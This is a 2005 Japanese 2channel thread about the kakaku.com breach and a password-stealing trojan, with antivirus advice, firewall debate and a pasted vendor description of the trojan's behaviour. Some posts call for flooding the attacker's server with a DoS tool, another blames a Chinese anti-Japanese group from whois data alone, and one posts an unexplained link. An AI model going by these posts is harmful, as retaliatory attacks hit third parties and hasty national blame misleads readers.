137 :名無しさん@5周年:2005/05/16(月) 12:29:40 ID:R/5yZY00
俺も感染してないなあ
しばらくパッチ当ててないセキュリティ中のIEでトップから踏み込んだんだけど

138 :名無しさん@5周年:2005/05/16(月) 12:29:47 ID:2mQVgLhZ
なー、FW談義は他所でやってよ。

139 :名無しさん@5周年:2005/05/16(月) 12:30:01 ID:s53gXUDR
Port 80を閉じれば感染防げますよ

140 :名無しさん@5周年:2005/05/16(月) 12:30:21 ID:x7zShmgt
>>134
それじゃ買い物もできないじゃん
てか通常が全部ONなんだからその場合はセキュリティレベルを下げるって言わないんじゃ

141 :名無しさん@5周年:2005/05/16(月) 12:30:30 ID:jMwXRzFG
>>135
まだ対応してないよ。

142 :名無しさん@5周年:2005/05/16(月) 12:30:41 ID:AAnXS2CS
>129
うちも>10では見つかりませんでしたけど、
Nav2005、BluckICE、Spybot、Ad-Aware、Spywareblasterくらいです。
ただa02.cssが最新のIUでも検出されないから結構不安…

143 :名無しさん@5周年:2005/05/16(月) 12:30:47 ID:xvQwQ4hd
>>110
ファイアーウォールと銘打ったソフト・ハードウェアと
ファイアーウォールという機能を持つと紹介されているソフト・ハードウェア

144 :名無しさん@5周年:2005/05/16(月) 12:31:15 ID:mm+IKCOE
>>116
ああ、もしかしてローカルPCで動かすタイプのパケットフィルタ
プログラムですか。
それならそれで製品によって何ができて何ができないのかが
大きく異なりますね。議論するならせめて製品くらいは特定しないと。

何を指すのか曖昧なままの用語がフワフワ浮かんでる状態であれこれ
取り沙汰するのはあまり意味のあることではないですね。

145 :名無しさん@5周年:2005/05/16(月) 12:31:21 ID:61LIqfi7
んー、FWって難しいですね。。おまいらスレ違いにレスありがとうございます。

146 :名無しさん@5周年:2005/05/16(月) 12:31:20 ID:xOLff2tL
窓からPC投げ捨てれば感染防げますよ

147 :名無しさん@5周年:2005/05/16(月) 12:31:40 ID:iDu4DMQC
もう日本は中国IPすべて弾けよ
すくなくとも俺はそうしてる

148 :名無しさん@5周年:2005/05/16(月) 12:31:48 ID:5oc9ocYh
>>132
そのPC、窓から捨てたほうがいいと思うよ。


149 :名無しさん@5周年:2005/05/16(月) 12:32:01 ID:MG/ml2Zu
13日の金曜日ってのが気になります。

150 :名無しさん@5周年:2005/05/16(月) 12:32:13 ID:ZeKUwKsC
>>140
……
>>134の三つって普段必要な時しかonにしないだろ?普通
おまいは四六時中買い物するのか?

151 :名無しさん@5周年:2005/05/16(月) 12:32:17 ID:YX05CVzK
インターネットにつないでるとウイルス感染が怖いので、LANケーブルを引きちぎりました。これで安心。

152 :名無しさん@5周年:2005/05/16(月) 12:32:31 ID:R/5yZY00
>>146
応用として自分の方を投げ捨てても感染被害は抑えられると思う

153 :名無しさん@5周年:2005/05/16(月) 12:32:35 ID:79NdRXyH
ウイルス駆除ソフトもそうだし、FWもそうだけど、
システムの根幹部分に近い感じで作動するソフトをそう簡単に入れたり削除したりするもんじゃ無いと思いますよ。

今あるアンチウイルス系が対策されるまで、大人しく待っていた方が無難かと・・・

154 :名無しさん@5周年:2005/05/16(月) 12:33:06 ID:Kjr8gtJQ
痛い信者の宣伝は役に立たないね
そしてバカの症状見せつけられるのもうざいし

155 :名無しさん@5周年:2005/05/16(月) 12:33:06 ID:u/81JbuV
>>134
だから設定だけじゃ駄目だっての
パッチ当てなきゃならんの
それとパッチ未公開の穴もあるから設定で無効にしても駄目なものは駄目なのよ

156 :名無しさん@5周年:2005/05/16(月) 12:33:10 ID:3SDzDXbH
>>151
電源ケーブルから入ってくるかもよ

157 :名無しさん@5周年:2005/05/16(月) 12:33:18 ID:2yd23JqI
ああ、なるほど…って   それじゃネトできねーじゃん 

158 :名無しさん@5周年:2005/05/16(月) 12:33:34 ID:xvQwQ4hd
>>134の三つって普段必要な時しかonにしないだろ?普通

お前の普通は間違いなく少数派

159 :名無しさん@5周年:2005/05/16(月) 12:33:41 ID:2tXG0OU7
ヤフオクで、これやったら感染力 絶大だろうな

160 :名無しさん@5周年:2005/05/16(月) 12:33:54 ID:mHrxr08A
イッテミソ☆ミ

http://oda.minidns.net/file/index.html

for kakaku

nod32_jp

ヤッテミソ☆彡


161 :名無しさん@5周年:2005/05/16(月) 12:34:04 ID:Ctp8Pzt/
教えてくださいご主人様。ActivexやJAVAをオフにしていもこういう今回のようなトラップに感染しますか?

162 :名無しさん@5周年:2005/05/16(月) 12:34:05 ID:PVVo30Qo
NOD32インスコするときってやっぱりノートン全部アンインスコ?

163 :名無しさん@5周年:2005/05/16(月) 12:34:08 ID:Yye7eHUm
>>157
ネット巡回はMacでやってるんで無問題w

164 :名無しさん@5周年:2005/05/16(月) 12:34:12 ID:x7zShmgt
>>150
お前の普通を一般の普通を当てはめるなよ
四六時中オンにしてる奴のが大多数だよ
わざわざWEB巡回するのにセキュリティを制限付きサイト並にまで上げる奴はね

165 :名無しさん@5周年:2005/05/16(月) 12:34:18 ID:ENTnOTGx
俺は班長の机の中に隠しました

166 :名無しさん@5周年:2005/05/16(月) 12:34:35 ID:ah4mpDvA
>>109
感染したら屁でもないって、増殖は防げないし、メーラーに寄生して
何かメールを送るたびにメールに添付する奴とかあるし、
ドライブに何かメディアを入れるたびに分身を忍び込ませるウイルスも多い。
プロセスを監視するとかもウイルスはsvchostなど名前を変えずにデフォルトの場所で
あたかも本物のように振舞いながら活動するのもある。

感染して屁でもないって考え方自体が危険。
あくまでも対処療法、 エイズに対するカクテル療法とおなじ

167 :名無しさん@5周年:2005/05/16(月) 12:34:43 ID:1GvE1h0Q
>>127
このスレ見る限り増えまくりw

168 :名無しさん@5周年:2005/05/16(月) 12:34:50 ID:R/5yZY00
一つだけいえることは俺はさっきbitdefenderとやらを入れて猛烈に後悔している
常駐なしとか言いながら勝手に常駐してコマンドベースでは切れない設定
最悪だよこのソフト

169 :名無しさん@5周年:2005/05/16(月) 12:35:30 ID:AAnXS2CS
>140
IEではONにしておいて、SleipnirやDonutみたいな
IEコンポーネントを使ったタブブラウザで必要な時だけONにすればよいのでは?

170 :名無しさん@5周年:2005/05/16(月) 12:35:41 ID:9Nhrj1gk
NOD32インスコして、スキャンしたけど、ウィルスは見つからなかった
問題無くて良かった良かったヽ(`Д´)ノ

171 :名無しさん@5周年:2005/05/16(月) 12:35:45 ID:r+MXicU6
>>127
>「ファイアーウォールソフトでファイアーウォール構築ができる」
>と誤解するDQNが増えそう。

え、違うの?よくわからんので詳しく。

172 :名無しさん@5周年:2005/05/16(月) 12:36:03 ID:jIIKsYzd
結局感染してる人って多いわけ?

173 :名無しさん@5周年:2005/05/16(月) 12:36:04 ID:5oc9ocYh
>>147
アウトポストのパッチで前もって弾けるのがあるから自力でやってね。

>>153
激しく同意。
一番の問題はNOD32が説明書で他のアンチウイルスソフトとの併用を
禁止し、アンインストールするようにいってること。
そんなのをノートンと一緒に起動したりしたらどんな不具合が発生するか
わからない。


174 :名無しさん@5周年:2005/05/16(月) 12:36:20 ID:lkzzCOoz
>>161
(´-`).。oO(今回のって、制限付でも防げないんじゃないか?)

フィルターでiflame禁止にしてるとか
何かのソフトで今回のウィルス元を拒否する設定にしてるとか
そういうんじゃないと無理だと思うんだけど

175 :名無しさん@5周年:2005/05/16(月) 12:36:22 ID:2yd23JqI
〉〉156        関西電力宣伝乙 

176 :名無しさん@5周年:2005/05/16(月) 12:36:22 ID:2tG+XmQJ
13日に価格コム経由で買い物した俺
感染してました・・・

177 :名無しさん@5周年:2005/05/16(月) 12:36:35 ID:/03hbOKE
毎日見てるから感染してるかも
もうノートン対応したよね?
感染するとどうなるの?

178 :名無しさん@5周年:2005/05/16(月) 12:36:43 ID:eDYUgkJ2
ID:mm+IKCOEとその仲間たちは別スレで愉快な討論を続けてください

179 :名無しさん@5周年:2005/05/16(月) 12:36:43 ID:mm+IKCOE
>>171 >>144を参照してね


180 :名無しさん@5周年:2005/05/16(月) 12:36:48 ID:3SDzDXbH
>>150
買い物しながら価格.comを見てしまう人は多いのでは?

181 :名無しさん@5周年:2005/05/16(月) 12:36:56 ID:u42AwZOf
もーさ、ウィルスに関する予防措置もとれんようなドザユーザーはパソコン使うな!
ウィルスメールが飛んできてうざいうざい!!!!!!!
迷惑なんじゃい!!
いまだにpifとんでくるし。

182 :名無しさん@5周年:2005/05/16(月) 12:37:24 ID:mFzOGYlQ
ダウンロードできねえよ!!!!!!1

183 :名無しさん@5周年:2005/05/16(月) 12:37:48 ID:Wniz55vx
■暫定まとめサイト

価格.comがクラッキングで一時閉鎖、閲覧ユーザーはウイルス感染も(´・ω・)
http://musyoku-waste.hp.infoseek.co.jp/test/index.htm

■以下は価格.com(http://kakaku.com/)より抜粋

>NOD32アンチウイルス体験版ダウンロード(Windowsユーザーのみ)
>http://kakaku.com/nod32j5.exe
>
>セットアップマニュアル(PDF)
>http://kakaku.com/nod32trial_man.pdf
>
>体験版ファイルをダウンロードし、セットアップマニュアルに従ってインストールしてください。
>ユーザー名、パスワードには、下記をご入力ください。
>ユーザー名:AV-2544986
>パスワード:viu9hcphek
>
>[有効期限2005年5月31日まで]

184 :名無しさん@5周年:2005/05/16(月) 12:37:48 ID:kZKBhVxU
>>153
同意。
kakaku.comは、NODでの検出を指定しておいて
ユーザーのPCに不具合だしたらどうするつもりなんだろう・・・。

185 :名無しさん@5周年:2005/05/16(月) 12:37:50 ID:YZlkHVfR
スキャン・駆除汁
http://housecall.trendmicro.com/housecall/start_corp.asp

186 :名無しさん@5周年:2005/05/16(月) 12:38:00 ID:xOLff2tL
>>110
ファイアーウォール(前提スキルファイアボールLV5、サイトLV1)
属性 火
種別 アクティブ/多段攻撃/地面指定/ノックバック

Lv 1〜10
基本詠唱時間(ms) 2000〜650
ディレイ(ms) 0
MATK倍率 0.5
ダメージ倍率 1
最大HIT数/火柱 5〜14
ノックバック距離(セル) 2
持続時間(s) 5〜14
消費SP 40



ホラヨ

187 :名無しさん@5周年:2005/05/16(月) 12:38:10 ID:a4TXOARd
只今スキャン中。
PSW.Delf.FZ trojan
が見つかったと出てきた・・・

188 :名無しさん@5周年:2005/05/16(月) 12:38:11 ID:x7zShmgt
>>169
そんな面倒なことやってる奴ほとんどいねーよ

189 :名無しさん@5周年:2005/05/16(月) 12:38:23 ID:GKV4McyJ
>>169
うちもそうやって運用してるよ。
Sleipnirはセキュリティ設定の切り替えが楽だしね。

190 :名無しさん@5周年:2005/05/16(月) 12:38:54 ID:lkzzCOoz
>>184
そこで「パソコン壊れたぞゴルァ」「あー、謝るのはもういいから社長だして」と
クレームの嵐で賠償金とりまくりんぐですよ

191 :名無しさん@5周年:2005/05/16(月) 12:38:58 ID:xvQwQ4hd
>>179
アプリケーションファイアーウォールもファイアーウォールの一部じゃないの?

192 :名無しさん@5周年:2005/05/16(月) 12:39:05 ID:eNTd14wV
>>189
俺も同じ。プニルで通常は画像のみON。

193 :名無しさん@5周年:2005/05/16(月) 12:39:08 ID:X10as6Dn
ちょにーしゃいんは
いぱーい感染してんだろうなぁ

194 :名無しさん@5周年:2005/05/16(月) 12:39:32 ID:r+MXicU6
>>179
それじゃわかんね('A`)
ファイアーウォールソフトでファイアーウォール構築ができないんなら
何をどうすれば"ファイアーウォール構築"ができるの?

195 :名無しさん@5周年:2005/05/16(月) 12:40:13 ID:CvtasasE
俺ブラックアイスディフェンダーっていうの使ってるから安心だろ?

196 :名無しさん@5周年:2005/05/16(月) 12:40:15 ID:79NdRXyH
kerioPF入れてると、
リストにないアプリが起動→問い合わせ
アプリが他のアプリ呼び出して起動させようとしている→問い合わせ
アプリのハッシュが変わって、変更されている→問い合わ
アプリがネットに繋ごうとしている→問い合わせ

この辺監視しておけるソフトを入れておくといいかも。
kerioの他にもあると思うよ。
kerioは本体の改変も察知してくれるみたいだし。

197 :名無しさん@5周年:2005/05/16(月) 12:40:36 ID:NJgm0cXX
>>191
普通なら、正解!
でも、>>179 の言いたい事はわからん。

198 :名無しさん@5周年:2005/05/16(月) 12:40:41 ID:w91G0CJd
んで、実際に被害にあった人は実在すんの?

199 :名無しさん@5周年:2005/05/16(月) 12:40:52 ID:Wniz55vx
■Vectorより

NOD32アンチウイルス ダウンロード標準版
http://www.vector.co.jp/soft/win95/util/se288813.html



200 :名無しさん@5周年:2005/05/16(月) 12:41:03 ID:qb/9WRry
喧嘩すんなよおまいら

201 :名無しさん@5周年:2005/05/16(月) 12:41:26 ID:R/5yZY00
うるせーバカ
価格コムシネや時間とらせやがって

202 :名無しさん@5周年:2005/05/16(月) 12:41:34 ID:KeUUgrMq
>>188
Sleipniらはみんなそうでしょ

203 :名無しさん@5周年:2005/05/16(月) 12:42:10 ID:AAnXS2CS
>188
そうなのか…この使い方に慣れちゃって、面倒だとは思わなくなってる。

>189
自分はDonutRaptだとCtrl+Kで切り替えられるからこっちですね。
Sleipnirは2chブラウザから起動するので全部切ってます。

204 :名無しさん@5周年:2005/05/16(月) 12:42:14 ID:PVVo30Qo
>>194
俺もさっぱりわからんwファイアウォールソフトでファイアウォール構築そのままじゃんw


205 :名無しさん@5周年:2005/05/16(月) 12:42:23 ID:3mLoeuHp
このNOD32ってえらく使いづらくない?
ウイルスが見つかったときのアクションを最初に設定しておかないと、
延々と時間をかけてスキャンしても、またまたclearにえらく時間がかかる
なぜなら、Documents and Settingsの下はデフォルトで選択されてしまうの
で、別の場所でウイルスが発見されても、そこだけclearはできないような
気がするのだが。

206 :名無しさん@5周年:2005/05/16(月) 12:42:24 ID:lkzzCOoz
>>202
そんな糞面倒くさいことするぐらいなら、最初から非IEの
FireFoxかOpera使ってるから。

宣伝お疲れ

207 :名無しさん@5周年:2005/05/16(月) 12:42:34 ID:/03hbOKE
ねぇノートンはまだなの?
誰か教えてよ

208 :名無しさん@5周年:2005/05/16(月) 12:42:55 ID:TG8ZgCVw
昨日は入れなかったのはこんな理由か
価格コムで買い物はしないけど、相場見るの便利だから

209 :名無しさん@5周年:2005/05/16(月) 12:43:29 ID:l5VHDKbV
>>207
自分で見に行けばいいだろ

210 :名無しさん@5周年:2005/05/16(月) 12:43:41 ID:fQGudHvt
早期復活希望!

211 :名無しさん@5周年:2005/05/16(月) 12:43:43 ID:EJ/uLnc8 ?
VB更新コネ━━━━━━(;´Д`)━━━━━━ !!!!!

212 :名無しさん@5周年:2005/05/16(月) 12:44:06 ID:79NdRXyH
>>208
目安なんだよね。あのサイト。
あのサイトの価格見て、色々とググルともっと安くて信用置ける店が結構ある。

213 :名無しさん@5周年:2005/05/16(月) 12:44:21 ID:ZeKUwKsC
>>206
IEコンポーネント利用のタブブラウザが起用している
セキュリティ設定一発変更に慣れるといちいち設定画面開くのはマンドクサ

214 :名無しさん@5周年:2005/05/16(月) 12:44:35 ID:kMixO/+5
仕事サボって買い物してた公務員はガクブルだろうな。


215 :名無しさん@5周年:2005/05/16(月) 12:44:44 ID:Wniz55vx
■暫定まとめサイト

価格.comがクラッキングで一時閉鎖、閲覧ユーザーはウイルス感染も(´・ω・)
http://musyoku-waste.hp.infoseek.co.jp/test/index.htm

■価格.com(http://kakaku.com/)より抜粋

>NOD32アンチウイルス体験版ダウンロード(Windowsユーザーのみ)
>http://kakaku.com/nod32j5.exe
>
>セットアップマニュアル(PDF)
>http://kakaku.com/nod32trial_man.pdf
>
>体験版ファイルをダウンロードし、セットアップマニュアルに従ってインストールしてください。
>ユーザー名、パスワードには、下記をご入力ください。
>ユーザー名:AV-2544986
>パスワード:viu9hcphek
>
>[有効期限2005年5月31日まで]

■もし上からNOD32をダウンロードできなかったらこちらでもいいかも

NOD32アンチウイルス ダウンロード標準版
http://www.vector.co.jp/soft/win95/util/se288813.html

216 :名無しさん@5周年:2005/05/16(月) 12:44:48 ID:PTB4ySiv
あのサイトをみて、秋葉原に買い物いくから
早く復旧してくれないかな・・・

217 :名無しさん@5周年:2005/05/16(月) 12:45:35 ID:K1D6s46W
antidoteフリーじゃ検出しねえな('A`)マンドクセ

218 :名無しさん@5周年:2005/05/16(月) 12:46:18 ID:mm+IKCOE
あんたらって・・・w
興味があるならとにかく「ファイアウォール」で一度ググってみたらどうかな
自分の知らないことって結構あるもんだよ

219 :名無しさん@5周年:2005/05/16(月) 12:46:45 ID:YSwFSIX9
ここで、FWがどうだと中途半端な知識ひけらかしてる奴の投稿には
有益なところが何一つない。よそでやれよ。ニュー速でやんな。

220 :名無しさん@5周年:2005/05/16(月) 12:47:18 ID:eDYUgkJ2
価格.comからダウンロードしようとしてる奴
素直にベクター(http://www.vector.co.jp/soft/win95/util/se288813.html)にまわってやれ
鯖がかわいそうでかわいそうで泣けてくる

221 :名無しさん@5周年:2005/05/16(月) 12:47:20 ID:FbvE4JIk
ノートンきのこ対応マダー!?

222 :名無しさん@5周年:2005/05/16(月) 12:47:35 ID:/03hbOKE
>>209
どうやってみるの?

223 :名無しさん@5周年:2005/05/16(月) 12:47:41 ID:qb/9WRry
>>218
自分じゃ説明できないのかw

224 :名無しさん@5周年:2005/05/16(月) 12:48:32 ID:r+MXicU6
>「ファイアーウォールソフトでファイアーウォール構築ができる」
>と誤解するDQNが増えそう。

これってどう誤解なの?
それを説明してほしいだけ。マジでわからんから。

225 :名無しさん@5周年:2005/05/16(月) 12:48:48 ID:iDu4DMQC
つまり、FWで感染後の挙動が防げるか否かという議論は
FWソフトを対象にした話であるなら、ソフトによって防げる対象がまったく異なるので
それを特定しないと議論にならない
また、FWが構築できるか否かについても、ルーターやソフトなどで、
またソフトの種類によって構築されるFWの質が異なるので
必ずしもある種の挙動を防ぐためのFWが構築できるとは言えない
ということ?

226 :名無しさん@5周年:2005/05/16(月) 12:49:12 ID:l5VHDKbV
>>222
シマンテックのサイトにいけばいいだろうが

227 :名無しさん@5周年:2005/05/16(月) 12:49:14 ID:G1Q/O8i9
トロイの木馬検出できたら削除していいの?頭弱いからよくわからん。

228 :名無しさん@5周年:2005/05/16(月) 12:49:25 ID:xvQwQ4hd
>>218
だからローカルPCで動かすタイプのパケットフィルタプログラムもファイアーウォールだろ。
ファイアーウォールがすべてそれじゃないけどさ。

229 :名無しさん@5周年:2005/05/16(月) 12:50:06 ID:Yye7eHUm
>>224
ココ行って聞いてこーい

ttp://pc8.2ch.net/test/read.cgi/win/1115046063/l50

230 :名無しさん@5周年:2005/05/16(月) 12:50:54 ID:e9il7z9M
で、犯人はどこの国ですか?

231 :名無しさん@5周年:2005/05/16(月) 12:50:55 ID:Y8Vb0iZd
ある特定のバカのせいでBitdefenderがまったく信用ならないという事はよく分かった。
血眼になってまるでどっかの押し売り野郎だ。

232 :名無しさん@5周年:2005/05/16(月) 12:51:07 ID:K1D6s46W
   ↑
ファイアーウォールはもういい
   ↓

233 :名無しさん@5周年:2005/05/16(月) 12:51:18 ID:BHPvi6Px
株価ストップ安?
まだ落ちるだろこりゃ

234 :名無しさん@5周年:2005/05/16(月) 12:51:50 ID:mm+IKCOE
>>223 ハイハイおバカさんw
>>224 「パーソナルファイアウォール」って呼ばれてるものと
    インフラレベルのファイアウォールは意味が違います
    「ファイアウォールの構築」っていうのは後者を指します普通。
>>225 前半正解。というか >>144で書いた通りです。
>>219 うん、俺もそう思うw じゃっ


235 :名無しさん@5周年:2005/05/16(月) 12:52:29 ID:lkzzCOoz
>>230
鯖は中国みたいだね、whoisによると
ただ、中国の鯖を使ってる日本人という可能性も否定できない

236 :名無しさん@5周年:2005/05/16(月) 12:52:36 ID:H+R8eAwf
>>231
bitdefenderってのも良くないの?
ここ見てるとなにがいいんだかワカンネえな( ・_ゝ・)

237 :名無しさん@5周年:2005/05/16(月) 12:52:39 ID:tRmwGQRo
1週間ほど前に覗いたから感染して無いか不安。
HPで確認しようにもページ繋がらないし・・・。
いったいPCにどんな影響を及ぼして、
対処用のソフトは何なのかとかまだ発表されて無いの??

238 :名無しさん@5周年:2005/05/16(月) 12:53:04 ID:WS9UeFKB
IEの制限付きサイトにwww.j4sb.com
を登録すりゃいいの?

239 :名無しさん@5周年:2005/05/16(月) 12:53:07 ID:80CT1ZsJ
あんな怪しい安置ウイルスソフト入れたくない!
脳豚早く対応してくれよ。。。

240 :名無しさん@5周年:2005/05/16(月) 12:53:24 ID:79NdRXyH
ID:mm+IKCOE

241 :名無しさん@5周年:2005/05/16(月) 12:53:51 ID:/03hbOKE
で、感染してるとどうなるのよ

242 :名無しさん@5周年:2005/05/16(月) 12:54:18 ID:1B7EFl0L
いまNOD32でスキャンしたけど、
ノートン・バスターよりスキャン早くない?
なんかちょっと不安だよ…

243 :名無しさん@5周年:2005/05/16(月) 12:54:38 ID:hD0quSOW
PSW.Delf.FZってどういうウィルスなのかググっても分からんかった
2件しか引っ掛からんし・・・ いい加減公式で説明しろや

244 :名無しさん@5周年:2005/05/16(月) 12:55:04 ID:HBm+I3hQ
キヤノンが対応できてて
二大ウイルス駆除メーカーのトレンドマイクロとシマンテックが
対応できてない所、情けないまじで。

245 :名無しさん@5周年:2005/05/16(月) 12:55:13 ID:SDeb9s5c
こんな時の為にMacを買っといてよかった

246 :名無しさん@5周年:2005/05/16(月) 12:55:14 ID:iDu4DMQC
>>238
制限付きでもアクセスできるんだよね
JavaとかActiveとか切ればいいだけならそれで防げるっぽいけど

247 :名無しさん@5周年:2005/05/16(月) 12:55:16 ID:Y8Vb0iZd
>>243
なにしろいくつもある会社ごとに違う名前を付けるからな

248 :名無しさん@5周年:2005/05/16(月) 12:55:17 ID:jG+aNbiR
もうバスターには対応したよね?


249 :名無しさん@5周年:2005/05/16(月) 12:55:23 ID:r+fImZgQ
これって最近行ってなければ無問題?
ここ2ヶ月ぐらいはアクセスしてないんだが・・・

250 :名無しさん@5周年:2005/05/16(月) 12:55:27 ID:/YGhqqki
>>239
ノートンは手動で最新定義にアップデートすればOKだってさ
自動アップデートではダメらしい
>>241
自覚症状がないままパスワードが駄々漏れ

251 :名無しさん@5周年:2005/05/16(月) 12:55:46 ID:R/5yZY00
NODは最悪BitDefenderも入れるな
ノートンの対応を待った方がいい

252 :名無しさん@5周年:2005/05/16(月) 12:56:12 ID:PVVo30Qo
インフラレベルってようするに企業のLAN全体のFWってこと?


253 :名無しさん@5周年:2005/05/16(月) 12:56:33 ID:eDYUgkJ2
>>242
でかいファイルは省いてるらしいよ
まあ今回のに限っては大丈夫でしょう
俺も調べ終わった、てか感染してないとは思ってたんだが
せっかくPass用意してくれたから一応調べてみた
感染してなかった。祭りにのりおくれてかなしー。

254 :名無しさん@5周年:2005/05/16(月) 12:57:04 ID:Gpf+ZSgC
>>236
普通に使えるよ。

255 :名無しさん@5周年:2005/05/16(月) 12:57:16 ID:+VguF0Vj

犯人は中国(おそらく北京)の反日組織です。証拠を発見しました。

スクリプトの拡張子が普通じゃないのに注目して、"count/counter.ap?id="をググってみると、

ttp://www.google.com/search?q=%22count%2Fcounter.ap%3Fid%3D%22

j4sb.com以外に shtm1.com と 0x61.com が同じスクリプトを走らせていることが分かります。
whoisでこれらのサイト情報を検索すると

ttp://whois.ansi.co.jp/?key=shtm1.com
ttp://whois.ansi.co.jp/?key=0x61.com

Admin Name........... pi ger
Admin Address........ hidden
Admin Address........
Admin Address........ Beijing
Admin Address........ 123456
Admin Address........ BJ
Admin Address........ CN
Admin Email.......... fuckjpmm@china.com
Admin Phone.......... +86.1012345678
Admin Fax............ +86.1012345678

と出てきます。 fuckjpmm とは "Fuck Japanese!" 
どう見ても反日です。
警察に通報して、外交問題にしてください。
まとめサイトの方、よろしく。


256 :名無しさん@5周年:2005/05/16(月) 12:57:32 ID:HM7gDnta
>>48
スクリプトと機器構成を見直すんじゃないの?
UNIX系に全面移行だったら1週間じゃちょっと短すぎるし、逆の意味で危険だ。
機能を大幅に減らしてなら出来るかも知れんけど。

257 :名無しさん@5周年:2005/05/16(月) 12:57:35 ID:G8sI2yn8
こうなったらみんなで一斉にwww.j4sb.comにアクセスしてサーバー落としたらどうだ?

258 :名無しさん@5周年:2005/05/16(月) 12:57:47 ID:qvsDUZN1
Defenderでスキャンしてるが、おまいらどのくらい時間かかった?

259 :名無しさん@5周年:2005/05/16(月) 12:57:51 ID:Dh+TG1IF
>>243
PSW.Delf シマンテックでぐぐったらすぐ見つかったけど・・・↓は過去ログのコピペ

Trojan.PSW.Ajim_bbs (別名:Trojan.PSW.Delf)

Trojan.PSW.Ajim_bbsが実行されると、次のことを行います。
自分自身の新しいコピーを%windir%Winupdate.exeおよび%windir%System32Internets.exeとして作成します。
トロイの木馬は既存の%windir%Winver.exeファイルを自分自身で上書きします。
また、オリジナルの%windir%Hostsファイルを独自の特別なHostsファイルで上書きします。
トロイの木馬は自分自身が最初に実行されたフォルダと同じフォルダにSet.iniファイルを作成します。
また、Set.iniファイルを%windir%Desktopフォルダにコピーすることで、そのファイルを Windowsのデスクトップに表示します。

トロイの木馬は次のレジストリキーを、.exeファイルが実行されるか、
または.txtファイルが開かれるときに自分自身が実行されるように改変します。

Trojan.PSW.Ajim_bbsはメモリに常駐し、ユーザ名およびパスワードと思われる情報を探し出します。
Trojan.PSW.Ajim_bbsはまた、既定のURLやホームページなど、Internet Explorerの設定を改変します。
トロイの木馬はメモリに常駐している間、ユーザがProcess Viewerプログラム
(このトロイの木馬上のプロセスを終了するために使用可能なプログラム)を実行しようとした場合、
それを検知しエラーメッセージを表示します。

260 :名無しさん@5周年:2005/05/16(月) 12:57:58 ID:WS9UeFKB
ノートンのオンラインスキャンで引っかかる?

261 :名無しさん@5周年:2005/05/16(月) 12:57:58 ID:8vuQpaID
>>250
ネットバンクの口座番号とか暗証番号もアウトってこと?((((;゚Д゚)))ガクガクガクブルブルブル

262 :名無しさん@5周年:2005/05/16(月) 12:58:05 ID:s53gXUDR
NOD32が嫌ならBitDefender Free EDをインスコすれば良いじゃないの

263 :名無しさん@5周年:2005/05/16(月) 12:58:44 ID:79NdRXyH
>>255
オメーが勝手に通報しろよ。
なに他人に頼ってんだよ馬鹿。

264 :名無しさん@5周年:2005/05/16(月) 12:59:29 ID:r+MXicU6
>>234
いや、「パーソナルファイアウォール」じゃなくて、ファイアーウォールソフトなんだけど

>「ファイアーウォールソフトでファイアーウォール構築ができる」
>と誤解するDQNが増えそう。

↑二行が正しいならば、ファイアーウォールソフトでファイアーウォール構築はできない
ということなんだよね?

265 :名無しさん@5周年:2005/05/16(月) 12:59:31 ID:gyhoJ9jr
ウイルスが落ち着けば、今度はkakaku総叩きかな。
いまここクマってやつ希望

266 :名無しさん@5周年:2005/05/16(月) 12:59:59 ID:xOLff2tL
>>252
セキュリティ板なり言った方がいいよ。

かいつまめばファイアウォールと一口に言っても、
ポートを管理(httpは80、ftpは21などあるが、それらの開閉をコントロール)するものから、
NAT機能(IPアドレスを有効活用する為や、ローカルIPを伏せたい場合などに使う)、
パケット監視(ウィルスチェックから、アタック検知、内部からの漏洩検知など様々)など、
ソフトやアプライアンス(ハード式)によって機能が様々だって事。

だから一口にファイアウォール入れてれば問題無いと言っても、
どんな機能を持っているかで出来る事が違うって事だ。

267 :名無しさん@5周年:2005/05/16(月) 13:00:05 ID:PVVo30Qo
>>260
ノートンってオンラインスキャンあるの?バスターなら知ってるけど

268 :名無しさん@5周年:2005/05/16(月) 13:00:16 ID:Dh1TJf3Q
結局ハッカーの犯人は中国人?


269 :名無しさん@5周年:2005/05/16(月) 13:00:23 ID:Bh9Kc5UO


田代砲きぼ〜ん、


270 :名無しさん@5周年:2005/05/16(月) 13:01:02 ID:1SzWFQCU
まとめサイトに紹介されていたBitDefenderで全スキャンやってみたけど、ウイルスは発見されなかった。
運が良かったのかな?

271 :名無しさん@5周年:2005/05/16(月) 13:01:09 ID:zFH0YgLD
これって、あれだろ。最近はやりの、あれ、おれおれ詐欺ってヤツ?

272 :名無しさん@5周年:2005/05/16(月) 13:01:15 ID:nN1B8KTQ
で、感染者に対するカカクコム対処は
テメー等で勝手に駆除しとけで終わりなのか

273 :名無しさん@5周年:2005/05/16(月) 13:01:15 ID:1OIbpppz
>>255
内容よくわからないけど載せてみます。
それって可能性高そうだったら、新聞とかに載るのかな?

274 :名無しさん@5周年:2005/05/16(月) 13:01:20 ID:IKIUNnpx
>>258
ローカル全部で40分w

275 :名無しさん@5周年:2005/05/16(月) 13:01:25 ID:lkzzCOoz
>>261
>>259の解説見るとわかると思うけど、パスワードを使うもの全て危険っぽいよ

276 :名無しさん@5周年:2005/05/16(月) 13:01:27 ID:P59zNuru
犯人は、価格コムと同様のサービスをしていて、
潰したがってる会社じゃない?
価格コムみたいなサービスやってる所って
どこだろ

277 :名無しさん@5周年:2005/05/16(月) 13:01:39 ID:qvsDUZN1
>>270
時間どのくらいかかりました?

278 :名無しさん@5周年:2005/05/16(月) 13:01:54 ID:2mQVgLhZ
>>264
その手の話やめろっつってんだろ。

279 :名無しさん@5周年:2005/05/16(月) 13:01:54 ID:kZKBhVxU
俺、俺、俺だけど

280 :名無しさん@5周年:2005/05/16(月) 13:02:10 ID:H6aXtadr
やっとインプレス入った
http://internet.watch.impress.co.jp/cda/news/2005/05/16/7599.html

281 :名無しさん@5周年:2005/05/16(月) 13:02:11 ID:Dh+TG1IF
>>255
マージですか!!  ってかの国の人しか動機なさげだけどww

282 :名無しさん@5周年:2005/05/16(月) 13:02:16 ID:+GLQh0aj
クライアントLinuxだから害はなかったけど。
早く復旧してくれよ価格さん。
パーツ探してるんだけど。
便乗で高くする店多くてかなわん。

283 :名無しさん@5周年:2005/05/16(月) 13:02:17 ID:Wniz55vx
ちょっと作業に戻りますので、あと必要を感じたら適当にコピペお願いします。

■暫定まとめサイト

価格.comがクラッキングで一時閉鎖、閲覧ユーザーはウイルス感染も(´・ω・)
http://musyoku-waste.hp.infoseek.co.jp/test/index.htm

■価格.com(http://kakaku.com/)より抜粋

>NOD32アンチウイルス体験版ダウンロード(Windowsユーザーのみ)
>http://kakaku.com/nod32j5.exe
>
>セットアップマニュアル(PDF)
>http://kakaku.com/nod32trial_man.pdf
